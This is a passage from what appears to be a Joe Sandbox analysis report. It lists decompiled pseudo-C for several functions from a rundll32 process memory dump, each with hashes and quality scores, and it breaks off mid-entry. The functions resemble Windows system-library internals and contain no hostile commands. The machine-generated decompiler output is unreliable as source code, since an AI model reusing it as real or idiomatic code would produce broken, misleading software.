                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 99a28f266f51eba7090a2351e40d823f84999f13a424ebc8f1536e4a5810186c
                                                                                                                • Instruction ID: 1dfae4be081724a45e82d65de66bcec9e7eb87edb4d344b19a00078ccdded8e8
                                                                                                                • Opcode Fuzzy Hash: 99a28f266f51eba7090a2351e40d823f84999f13a424ebc8f1536e4a5810186c
                                                                                                                • Instruction Fuzzy Hash: 1211083270071067FF30AA3A9C41B26B298FB54F65F54446BF602AB282DBF4FC459655
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E044437F5(void* __ecx, intOrPtr* __edx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed char _t6;
                                                                                                                				intOrPtr _t13;
                                                                                                                				intOrPtr* _t20;
                                                                                                                				intOrPtr* _t27;
                                                                                                                				void* _t28;
                                                                                                                				intOrPtr* _t29;
                                                                                                                
                                                                                                                				_t27 = __edx;
                                                                                                                				_t28 = __ecx;
                                                                                                                				if(__edx == 0) {
                                                                                                                					E04422280(_t6, 0x44f8550);
                                                                                                                				}
                                                                                                                				_t29 = E0444387E(_t28);
                                                                                                                				if(_t29 == 0) {
                                                                                                                					L6:
                                                                                                                					if(_t27 == 0) {
                                                                                                                						E0441FFB0(0x44f8550, _t27, 0x44f8550);
                                                                                                                					}
                                                                                                                					if(_t29 == 0) {
                                                                                                                						return 0xc0000225;
                                                                                                                					} else {
                                                                                                                						if(_t27 != 0) {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t13 =  *_t29;
                                                                                                                					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                                                                                						L13:
                                                                                                                						_push(3);
                                                                                                                						asm("int 0x29");
                                                                                                                						L14:
                                                                                                                						 *_t27 = _t29;
                                                                                                                						L11:
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                                                                                					if( *_t20 != _t29) {
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                					 *_t20 = _t13;
                                                                                                                					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                                                                                					asm("btr eax, ecx");
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}











                                                                                                                0x00000000
                                                                                                                0x04443841

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9823f370f3a70b9edc1a894f4aa6d80f2a395ff658006722c59c36d3145d2a86
                                                                                                                • Instruction ID: bf240162e49331c83f321758bec58f0f3cb778c3022ce53137dcb8f0c440df58
                                                                                                                • Opcode Fuzzy Hash: 9823f370f3a70b9edc1a894f4aa6d80f2a395ff658006722c59c36d3145d2a86
                                                                                                                • Instruction Fuzzy Hash: 7501A172B01A109BEB368F1A9940A2BFBE6DBC5E74715446FED498B311D734F801C690
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0440C962(char __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t19;
                                                                                                                				char _t22;
                                                                                                                				intOrPtr _t26;
                                                                                                                				intOrPtr _t27;
                                                                                                                				char _t32;
                                                                                                                				char _t34;
                                                                                                                				intOrPtr _t35;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr* _t38;
                                                                                                                				signed int _t39;
                                                                                                                
                                                                                                                				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                                                                				_v8 =  *0x44fd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                                                                				_t34 = __ecx;
                                                                                                                				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                                                                					_t26 = 0;
                                                                                                                					E0441EEF0(0x44f70a0);
                                                                                                                					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                                                                					if(E0448F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                                                                						L9:
                                                                                                                						E0441EB70(_t29, 0x44f70a0);
                                                                                                                						_t19 = _t26;
                                                                                                                						L2:
                                                                                                                						_pop(_t35);
                                                                                                                						_pop(_t37);
                                                                                                                						_pop(_t27);
                                                                                                                						return E0444B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                                                                					}
                                                                                                                					_t29 = _t34;
                                                                                                                					_t26 = E0448F1FC(_t34, _t32);
                                                                                                                					if(_t26 < 0) {
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					_t38 =  *0x44f70c0; // 0x0
                                                                                                                					while(_t38 != 0x44f70c0) {
                                                                                                                						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                                                                						_t38 =  *_t38;
                                                                                                                						_v12 = _t22;
                                                                                                                						if(_t22 != 0) {
                                                                                                                							_t29 = _t22;
                                                                                                                							 *0x44fb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                                                                							_v12();
                                                                                                                						}
                                                                                                                					}
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t19 = 0;
                                                                                                                				goto L2;
                                                                                                                			}



















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6ab4488d54badaadb3c134e556adbb98da8bd35963e620948ec5066cb3fc5aa
                                                                                                                • Instruction ID: 1cbcf8bf1fc92dfba41804efd42bdce2bc4bc906ed9040daa19050545342785c
                                                                                                                • Opcode Fuzzy Hash: a6ab4488d54badaadb3c134e556adbb98da8bd35963e620948ec5066cb3fc5aa
                                                                                                                • Instruction Fuzzy Hash: 3911A0327006469FEF10AE69CD8596B7BE5FF88614B50053EED4283651DB24FC15CBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0443002D() {
                                                                                                                				void* _t11;
                                                                                                                				char* _t14;
                                                                                                                				signed char* _t16;
                                                                                                                				char* _t27;
                                                                                                                				signed char* _t29;
                                                                                                                
                                                                                                                				_t11 = E04427D50();
                                                                                                                				_t27 = 0x7ffe0384;
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                				} else {
                                                                                                                					_t14 = 0x7ffe0384;
                                                                                                                				}
                                                                                                                				_t29 = 0x7ffe0385;
                                                                                                                				if( *_t14 != 0) {
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t16 = 0x7ffe0385;
                                                                                                                					} else {
                                                                                                                						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                					}
                                                                                                                					if(( *_t16 & 0x00000040) != 0) {
                                                                                                                						goto L18;
                                                                                                                					} else {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L3:
                                                                                                                					if(E04427D50() != 0) {
                                                                                                                						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                					}
                                                                                                                					if( *_t27 != 0) {
                                                                                                                						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						if(E04427D50() != 0) {
                                                                                                                							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                						}
                                                                                                                						if(( *_t29 & 0x00000020) == 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						L5:
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}









                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                • Instruction ID: d4991f19c940d8b1fe116015943daf3aaa33569b28cad65ecaf301adf50bbe50
                                                                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                • Instruction Fuzzy Hash: BC11E1327056808FEF228B29DA44B7677A4EB45B98F0900A3DD0497792E328FC42C660
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E0441766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                				char _v8;
                                                                                                                				void* _t22;
                                                                                                                				void* _t24;
                                                                                                                				intOrPtr _t29;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				void* _t42;
                                                                                                                				intOrPtr _t47;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t36 =  &_v8;
                                                                                                                				if(E0443F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                                                                                					L10:
                                                                                                                					_t22 = 0;
                                                                                                                				} else {
                                                                                                                					_t24 = _v8 + __ecx;
                                                                                                                					_t42 = _t24;
                                                                                                                					if(_t24 < __ecx) {
                                                                                                                						goto L10;
                                                                                                                					} else {
                                                                                                                						if(E0443F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                                                                                							goto L10;
                                                                                                                						} else {
                                                                                                                							_t29 = _v8 + _t42;
                                                                                                                							if(_t29 < _t42) {
                                                                                                                								goto L10;
                                                                                                                							} else {
                                                                                                                								_t47 = _t29;
                                                                                                                								_t30 = _a16;
                                                                                                                								if(_t30 != 0) {
                                                                                                                									 *_t30 = _t47;
                                                                                                                								}
                                                                                                                								if(_t47 == 0) {
                                                                                                                									goto L10;
                                                                                                                								} else {
                                                                                                                									_t22 = L04424620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t22;
                                                                                                                			}











                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                • Instruction ID: d308aa2de44150be46237120acd8db87b237ff71b5fa2ccd61a63cb21ae855cc
                                                                                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                • Instruction Fuzzy Hash: 0F018432700119AFDB20EE5ECD45E5B77ADEB88B70B24452AB948CB264DA30ED0187A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 46%
                                                                                                                			E0449C450(intOrPtr* _a4) {
                                                                                                                				signed char _t25;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				intOrPtr* _t27;
                                                                                                                
                                                                                                                				_t26 = _a4;
                                                                                                                				_t25 =  *(_t26 + 0x10);
                                                                                                                				if((_t25 & 0x00000003) != 1) {
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push( *((intOrPtr*)(_t26 + 8)));
                                                                                                                					_push(0);
                                                                                                                					_push( *_t26);
                                                                                                                					E04449910();
                                                                                                                					_t25 =  *(_t26 + 0x10);
                                                                                                                				}
                                                                                                                				if((_t25 & 0x00000001) != 0) {
                                                                                                                					_push(4);
                                                                                                                					_t7 = _t26 + 4; // 0x4
                                                                                                                					_t27 = _t7;
                                                                                                                					_push(_t27);
                                                                                                                					_push(5);
                                                                                                                					_push(0xfffffffe);
                                                                                                                					E044495B0();
                                                                                                                					if( *_t27 != 0) {
                                                                                                                						_push( *_t27);
                                                                                                                						E044495D0();
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t8 = _t26 + 0x14; // 0x14
                                                                                                                				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                                                                                				}
                                                                                                                				_push( *_t26);
                                                                                                                				E044495D0();
                                                                                                                				return L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                                                                                			}







                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                • Instruction ID: 399dab492659956fa2570bb4c90e0641f17da804cd0a3fb2032949ec2e8fc494
                                                                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                • Instruction Fuzzy Hash: F50180B2240505BFFE21AF66CC81E63BB6DFB94794F10452AF11442661CB31BCA0DAA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E04409080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                                                				intOrPtr* _t51;
                                                                                                                				intOrPtr _t59;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t67;
                                                                                                                				signed int* _t71;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t77;
                                                                                                                				signed int _t82;
                                                                                                                				intOrPtr* _t84;
                                                                                                                				void* _t85;
                                                                                                                				intOrPtr* _t87;
                                                                                                                				void* _t94;
                                                                                                                				signed int _t95;
                                                                                                                				intOrPtr* _t97;
                                                                                                                				signed int _t99;
                                                                                                                				signed int _t102;
                                                                                                                				void* _t104;
                                                                                                                
                                                                                                                				_push(__ebx);
                                                                                                                				_push(__esi);
                                                                                                                				_push(__edi);
                                                                                                                				_t97 = __ecx;
                                                                                                                				_t102 =  *(__ecx + 0x14);
                                                                                                                				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                                                                					_t102 = _t102 | 0x000007d0;
                                                                                                                				}
                                                                                                                				_t48 =  *[fs:0x30];
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                                					_t102 = _t102 & 0xff000000;
                                                                                                                				}
                                                                                                                				_t80 = 0x44f85ec;
                                                                                                                				E04422280(_t48, 0x44f85ec);
                                                                                                                				_t51 =  *_t97 + 8;
                                                                                                                				if( *_t51 != 0) {
                                                                                                                					L6:
                                                                                                                					return E0441FFB0(_t80, _t97, _t80);
                                                                                                                				} else {
                                                                                                                					 *(_t97 + 0x14) = _t102;
                                                                                                                					_t84 =  *0x44f538c; // 0x36b1e0
                                                                                                                					if( *_t84 != 0x44f5388) {
                                                                                                                						_t85 = 3;
                                                                                                                						asm("int 0x29");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						asm("int3");
                                                                                                                						_push(0x2c);
                                                                                                                						_push(0x44df6e8);
                                                                                                                						E0445D0E8(0x44f85ec, _t97, _t102);
                                                                                                                						 *((char*)(_t104 - 0x1d)) = 0;
                                                                                                                						_t99 =  *(_t104 + 8);
                                                                                                                						__eflags = _t99;
                                                                                                                						if(_t99 == 0) {
                                                                                                                							L13:
                                                                                                                							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                                							if(__eflags == 0) {
                                                                                                                								E044D88F5(_t80, _t85, 0x44f5388, _t99, _t102, __eflags);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags = _t99 -  *0x44f86c0; // 0x3507b0
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L13;
                                                                                                                							} else {
                                                                                                                								__eflags = _t99 -  *0x44f86b8; // 0x0
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L13;
                                                                                                                								} else {
                                                                                                                									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                                                                									__eflags =  *((char*)(_t59 + 0x28));
                                                                                                                									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                                                                										E04422280(_t99 + 0xe0, _t99 + 0xe0);
                                                                                                                										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                                                                										__eflags =  *((char*)(_t99 + 0xe5));
                                                                                                                										if(__eflags != 0) {
                                                                                                                											E044D88F5(0x44f85ec, _t85, 0x44f5388, _t99, _t102, __eflags);
                                                                                                                										} else {
                                                                                                                											__eflags =  *((char*)(_t99 + 0xe4));
                                                                                                                											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                                                                												 *((char*)(_t99 + 0xe4)) = 1;
                                                                                                                												_push(_t99);
                                                                                                                												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                                                                												E0444AFD0();
                                                                                                                											}
                                                                                                                											while(1) {
                                                                                                                												_t71 = _t99 + 8;
                                                                                                                												 *(_t104 - 0x2c) = _t71;
                                                                                                                												_t80 =  *_t71;
                                                                                                                												_t95 = _t71[1];
                                                                                                                												 *(_t104 - 0x28) = _t80;
                                                                                                                												 *(_t104 - 0x24) = _t95;
                                                                                                                												while(1) {
                                                                                                                													L19:
                                                                                                                													__eflags = _t95;
                                                                                                                													if(_t95 == 0) {
                                                                                                                														break;
                                                                                                                													}
                                                                                                                													_t102 = _t80;
                                                                                                                													 *(_t104 - 0x30) = _t95;
                                                                                                                													 *(_t104 - 0x24) = _t95 - 1;
                                                                                                                													asm("lock cmpxchg8b [edi]");
                                                                                                                													_t80 = _t102;
                                                                                                                													 *(_t104 - 0x28) = _t80;
                                                                                                                													 *(_t104 - 0x24) = _t95;
                                                                                                                													__eflags = _t80 - _t102;
                                                                                                                													_t99 =  *(_t104 + 8);
                                                                                                                													if(_t80 != _t102) {
                                                                                                                														continue;
                                                                                                                													} else {
                                                                                                                														__eflags = _t95 -  *(_t104 - 0x30);
                                                                                                                														if(_t95 !=  *(_t104 - 0x30)) {
                                                                                                                															continue;
                                                                                                                														} else {
                                                                                                                															__eflags = _t95;
                                                                                                                															if(_t95 != 0) {
                                                                                                                																_t74 = 0;
                                                                                                                																 *(_t104 - 0x34) = 0;
                                                                                                                																_t102 = 0;
                                                                                                                																__eflags = 0;
                                                                                                                																while(1) {
                                                                                                                																	 *(_t104 - 0x3c) = _t102;
                                                                                                                																	__eflags = _t102 - 3;
                                                                                                                																	if(_t102 >= 3) {
                                                                                                                																		break;
                                                                                                                																	}
                                                                                                                																	__eflags = _t74;
                                                                                                                																	if(_t74 != 0) {
                                                                                                                																		L49:
                                                                                                                																		_t102 =  *_t74;
                                                                                                                																		__eflags = _t102;
                                                                                                                																		if(_t102 != 0) {
                                                                                                                																			_t102 =  *(_t102 + 4);
                                                                                                                																			__eflags = _t102;
                                                                                                                																			if(_t102 != 0) {
                                                                                                                																				 *0x44fb1e0(_t74, _t99);
                                                                                                                																				 *_t102();
                                                                                                                																			}
                                                                                                                																		}
                                                                                                                																		do {
                                                                                                                																			_t71 = _t99 + 8;
                                                                                                                																			 *(_t104 - 0x2c) = _t71;
                                                                                                                																			_t80 =  *_t71;
                                                                                                                																			_t95 = _t71[1];
                                                                                                                																			 *(_t104 - 0x28) = _t80;
                                                                                                                																			 *(_t104 - 0x24) = _t95;
                                                                                                                																			goto L19;
                                                                                                                																		} while (_t74 == 0);
                                                                                                                																		goto L49;
                                                                                                                																	} else {
                                                                                                                																		_t82 = 0;
                                                                                                                																		__eflags = 0;
                                                                                                                																		while(1) {
                                                                                                                																			 *(_t104 - 0x38) = _t82;
                                                                                                                																			__eflags = _t82 -  *0x44f84c0;
                                                                                                                																			if(_t82 >=  *0x44f84c0) {
                                                                                                                																				break;
                                                                                                                																			}
                                                                                                                																			__eflags = _t74;
                                                                                                                																			if(_t74 == 0) {
                                                                                                                																				_t77 = E044D9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                                                                																				__eflags = _t77;
                                                                                                                																				if(_t77 == 0) {
                                                                                                                																					_t74 = 0;
                                                                                                                																					__eflags = 0;
                                                                                                                																				} else {
                                                                                                                																					_t74 = _t77 + 0xfffffff4;
                                                                                                                																				}
                                                                                                                																				 *(_t104 - 0x34) = _t74;
                                                                                                                																				_t82 = _t82 + 1;
                                                                                                                																				continue;
                                                                                                                																			}
                                                                                                                																			break;
                                                                                                                																		}
                                                                                                                																		_t102 = _t102 + 1;
                                                                                                                																		continue;
                                                                                                                																	}
                                                                                                                																	goto L20;
                                                                                                                																}
                                                                                                                																__eflags = _t74;
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                													break;
                                                                                                                												}
                                                                                                                												L20:
                                                                                                                												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                                                                												 *((char*)(_t99 + 0xe5)) = 1;
                                                                                                                												 *((char*)(_t104 - 0x1d)) = 1;
                                                                                                                												goto L21;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										L21:
                                                                                                                										 *(_t104 - 4) = 0xfffffffe;
                                                                                                                										E0440922A(_t99);
                                                                                                                										_t64 = E04427D50();
                                                                                                                										__eflags = _t64;
                                                                                                                										if(_t64 != 0) {
                                                                                                                											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                										} else {
                                                                                                                											_t67 = 0x7ffe0386;
                                                                                                                										}
                                                                                                                										__eflags =  *_t67;
                                                                                                                										if( *_t67 != 0) {
                                                                                                                											_t67 = E044D8B58(_t99);
                                                                                                                										}
                                                                                                                										__eflags =  *((char*)(_t104 - 0x1d));
                                                                                                                										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                                                                											__eflags = _t99 -  *0x44f86c0; // 0x3507b0
                                                                                                                											if(__eflags != 0) {
                                                                                                                												__eflags = _t99 -  *0x44f86b8; // 0x0
                                                                                                                												if(__eflags == 0) {
                                                                                                                													_t94 = 0x44f86bc;
                                                                                                                													_t87 = 0x44f86b8;
                                                                                                                													goto L27;
                                                                                                                												} else {
                                                                                                                													__eflags = _t67 | 0xffffffff;
                                                                                                                													asm("lock xadd [edi], eax");
                                                                                                                													if(__eflags == 0) {
                                                                                                                														E04409240(_t80, _t99, _t99, _t102, __eflags);
                                                                                                                													}
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t94 = 0x44f86c4;
                                                                                                                												_t87 = 0x44f86c0;
                                                                                                                												L27:
                                                                                                                												E04439B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										goto L13;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						return E0445D130(_t80, _t99, _t102);
                                                                                                                					} else {
                                                                                                                						 *_t51 = 0x44f5388;
                                                                                                                						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                                                                						 *_t84 = _t51;
                                                                                                                						 *0x44f538c = _t51;
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}





















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 605cdd807ca3fba90593a29ccd5dca33ff8b605c53459479b8c8bd91e1311ccc
                                                                                                                • Instruction ID: a0610887d3c8fd217a49844849f0ce62f46dcd30998ca64a69587acbf711cfe4
                                                                                                                • Opcode Fuzzy Hash: 605cdd807ca3fba90593a29ccd5dca33ff8b605c53459479b8c8bd91e1311ccc
                                                                                                                • Instruction Fuzzy Hash: 6501F4B26012009FEB249F08D840B12B7A9EB41325F25807BE2059B7D3C778FC51CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E044D4015(signed int __eax, signed int __ecx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed char _t10;
                                                                                                                				signed int _t28;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t28 = __ecx;
                                                                                                                				asm("lock xadd [edi+0x24], eax");
                                                                                                                				_t10 = (__eax | 0xffffffff) - 1;
                                                                                                                				if(_t10 == 0) {
                                                                                                                					_t1 = _t28 + 0x1c; // 0x1e
                                                                                                                					E04422280(_t10, _t1);
                                                                                                                					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                					E04422280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x44f86ac);
                                                                                                                					E0440F900(0x44f86d4, _t28);
                                                                                                                					E0441FFB0(0x44f86ac, _t28, 0x44f86ac);
                                                                                                                					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                                                                                					E0441FFB0(0, _t28, _t1);
                                                                                                                					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                                                                                					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                                                                                						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                                                                					}
                                                                                                                					_t10 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                                                				}
                                                                                                                				return _t10;
                                                                                                                			}








                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 427b3a889518acaa2838bf5a2264d278621fc309981741a8a18fe92ea2524cb9
